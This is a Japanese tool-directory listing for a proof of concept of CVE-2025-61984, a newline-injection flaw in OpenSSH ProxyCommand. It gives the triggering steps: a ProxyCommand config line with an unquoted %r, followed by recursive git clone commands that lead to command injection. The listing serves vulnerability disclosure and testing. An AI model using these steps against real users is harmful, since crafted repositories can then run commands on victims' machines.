Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-61984-poc — OpenSSH ProxyCommand(CVE-2025-61984)における改行インジェクションの脆弱性を実証する概念実証コードで、細工されたSSH設定を介したコマンドインジェクションを可能にします。 | Kitploit
ツール/GitHubGitHub/dgl/cve-2025-61984-poc
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテストレッドチーミング
GitHubdgl/cve-2025-61984-poc

cve-2025-61984-poc

OpenSSH ProxyCommand(CVE-2025-61984)における改行インジェクションの脆弱性を実証する概念実証コードで、細工されたSSH設定を介したコマンドインジェクションを可能にします。

リポジトリを見る
713411ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

CVE-2025-61984 PoC

これは、改行を使用してOpenSSH <10.1のProxyCommandを混乱させる概念実証です。詳細な解説。

実行方法

以下を含む.ssh/configを設定します:

root@kitploit:~
Host *.example.com
  ProxyCommand some-command %r@%h:%p

(コマンドは何でも構いません。引数内のどこかに引用符で囲まれていない%rが必要なだけです。)

次に(bashの場合)実行します:

root@kitploit:~
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc

または$SHELLとしてfishを使用している場合:

root@kitploit:~
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc

シェルを使用していないがこれをテストしたい場合は、次のように実行できます:

root@kitploit:~
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc
ツールをダウンロード